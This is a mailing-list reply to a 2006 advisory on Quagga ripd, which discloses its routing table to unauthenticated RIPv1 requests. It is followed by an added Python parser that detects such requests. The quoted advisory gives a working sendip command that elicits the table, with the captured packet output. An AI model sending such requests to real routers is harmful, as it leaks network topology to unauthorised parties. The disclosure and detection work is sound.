[quagga-users 6835] Re: Quagga RIPD unauthenticated route table broadcast

Paul Jakma paul at clubi.ie
Wed May 3 05:27:43 IST 2006


Hi Konstantin,

Thanks very much for the report. I've created bug #261 for this 
issue. Note btw that the unicast replies will have default TTL set - 
the REQUESTing host need not be on-link, they could be anywhere. See 
my comments on the bug entry.

On Wed, 3 May 2006, Konstantin V. Gavrilenko wrote:

> Arhont Ltd - Information Security
>
> Advisory by:	Konstantin V. Gavrilenko (http://www.arhont.com)
> Arhont ref:	arh200604-1
> Advisory:	Quagga RIPD unauthenticated route table broadcast
> Class:		design bug?
> Version:	Tested on Quagga suite v0.98.5, v0.99.3 (Gentoo, 2.6.15)
> Model Specific:	Other versions might have the same bug
>
>
> DETAILS
> Quagga would respond to a RIP v1 request for SEND UPDATE and send out the
> routing table updates, even if it has been configured to work with
> version 2 of the protocol only, using the following settings in the
> config file:
>
> interface eth0
> ip rip send version 2
> ip rip receive version 2
> !
> router rip
> version 2
>
> Sending a request for update:
> arhontus / # sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p
> rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111
>
> Catching response on the attacker host:
> arhontus / # tcpdump -n -i eth0 port 520
> 22:10:02.532103 IP 192.168.66.102.520 > 192.168.66.111.520: RIPv1,
> Request, length: 24
> 22:10:02.532474 IP 192.168.66.111.520 > 192.168.66.102.520: RIPv1,
> Response, length: 64
>
> Tethereal extract from the response RIP packet:
> Routing Information Protocol
>    Command: Response (2)
>    Version: RIPv1 (1)
>    IP Address: 0.0.0.0, Metric: 1
>        Address Family: IP (2)
>        IP Address: 0.0.0.0 (0.0.0.0)
>        Metric: 1
>    IP Address: 192.168.50.24, Metric: 1
>        Address Family: IP (2)
>        IP Address: 192.168.50.24 (192.168.50.24)
>        Metric: 1
>    IP Address: 192.168.77.0, Metric: 1
>        Address Family: IP (2)
>        IP Address: 192.168.77.0 (192.168.77.0)
>        Metric: 1
>
> The same situation is observed if Quagga has been configured to accept
> packets with plaintext or md5 authentication only, using the following
> options in the configuration:
>
> interface eth0
> ip rip authentication mode md5 auth-length old-ripd
> ip rip authentication key-chain dmz_auth
>
> The response packet contains the same information as in previous example.
>
>
> This vulnerability can be exploited to extract the routing table
> information from a router that is otherwise inaccessible due to strict
> control of the multicast packets spread on the switch ports, or an
> extremely large interval set between updates.
>
>
> RISK FACTOR: Low
>
>
> WORKAROUNDS: Firewall the access to the ripd daemon on a need-to-access
> basis.
>
> COMMUNICATION HISTORY:
> Issue discovered:	  10/04/2006
> Quagga notified:	  24/04/2006
> Public disclosure:	  03/05/2006
>
> ADDITIONAL INFORMATION:
> *According to the Arhont Ltd. policy, all of the found vulnerabilities
> and security issues will be reported to the manufacturer at least 7 days
> before releasing them to the public domains (such as CERT and BUGTRAQ).
>
> If you would like to get more information about this issue, please do
> not hesitate to contact Arhont team on info at arhont.com

-- 
Paul Jakma	paul at clubi.ie	paul at jakma.org	Key ID: 64A2FF6A
Fortune:
"We want to create puppets that pull their own strings."
-- Ann Marion

"Would this make them Marionettes?"
-- Jeff Daiell
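A parser for the RIP datagrams shown in the advisory, with a check that flags the condition it describes (RIPv1 traffic reaching an interface configured for version 2 only, and the whole-table request form of that traffic). This is an added example, neither Quagga's code nor Arhont's; the sample packets are constructed from the tethereal dump above, and their lengths match the 24- and 64-byte datagrams in the tcpdump output.

```python
import struct
from ipaddress import IPv4Address

RIP_REQUEST, RIP_RESPONSE = 1, 2
HEADER = struct.Struct("!BBH")        # command, version, must-be-zero
ENTRY = struct.Struct("!HH4s4s4sI")   # AF, route tag, addr, mask, next hop, metric
INFINITY = 16                         # RIP metric meaning "unreachable"


def _entry(af, addr, metric):
    """Pack one 20-byte route entry (tag, mask and next hop zero, as in the dump)."""
    return ENTRY.pack(af, 0, IPv4Address(addr).packed, b"\0" * 4, b"\0" * 4, metric)


# Constructed sample traffic, reproduced from the advisory's tcpdump/tethereal output:
# the 24-byte RIPv1 whole-table request and the 64-byte RIPv1 response it elicited.
SAMPLE_REQUEST = HEADER.pack(RIP_REQUEST, 1, 0) + _entry(0, "0.0.0.0", INFINITY)
SAMPLE_RESPONSE = (HEADER.pack(RIP_RESPONSE, 1, 0) + _entry(2, "0.0.0.0", 1)
                   + _entry(2, "192.168.50.24", 1) + _entry(2, "192.168.77.0", 1))


def parse_rip(data):
    """Decode a RIP datagram into {command, version, entries}; reject bad sizes."""
    if len(data) < HEADER.size or (len(data) - HEADER.size) % ENTRY.size:
        raise ValueError("bad RIP length %d" % len(data))
    command, version, _ = HEADER.unpack_from(data)
    entries = []
    for off in range(HEADER.size, len(data), ENTRY.size):
        af, _tag, addr, _mask, _nh, metric = ENTRY.unpack_from(data, off)
        entries.append({"af": af, "addr": str(IPv4Address(addr)), "metric": metric})
    return {"command": command, "version": version, "entries": entries}


def is_whole_table_request(pkt):
    """RFC 1058 / RFC 2453: one entry with AF 0 and metric 16 asks for the full table."""
    e = pkt["entries"]
    return (pkt["command"] == RIP_REQUEST and len(e) == 1
            and e[0]["af"] == 0 and e[0]["metric"] == INFINITY)


def check_policy(pkt, src, dst, recv_versions=(2,)):
    """Findings for a datagram seen on an interface whose configured receive
    versions are recv_versions ('ip rip receive version 2' in the advisory)."""
    findings = []
    if pkt["version"] not in recv_versions:
        kind = "request" if pkt["command"] == RIP_REQUEST else "response"
        findings.append(f"RIPv{pkt['version']} {kind} {src} -> {dst} violates receive-version policy")
    if is_whole_table_request(pkt):
        findings.append(f"whole-table request from {src}; a reply would disclose the routing table")
    return findings


if __name__ == "__main__":
    print(check_policy(parse_rip(SAMPLE_REQUEST), "192.168.66.102", "192.168.66.111"))
```

Run over UDP/520 payloads captured on the router's interface, both findings fire for the advisory's request and the version finding fires for the response Quagga sent back.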

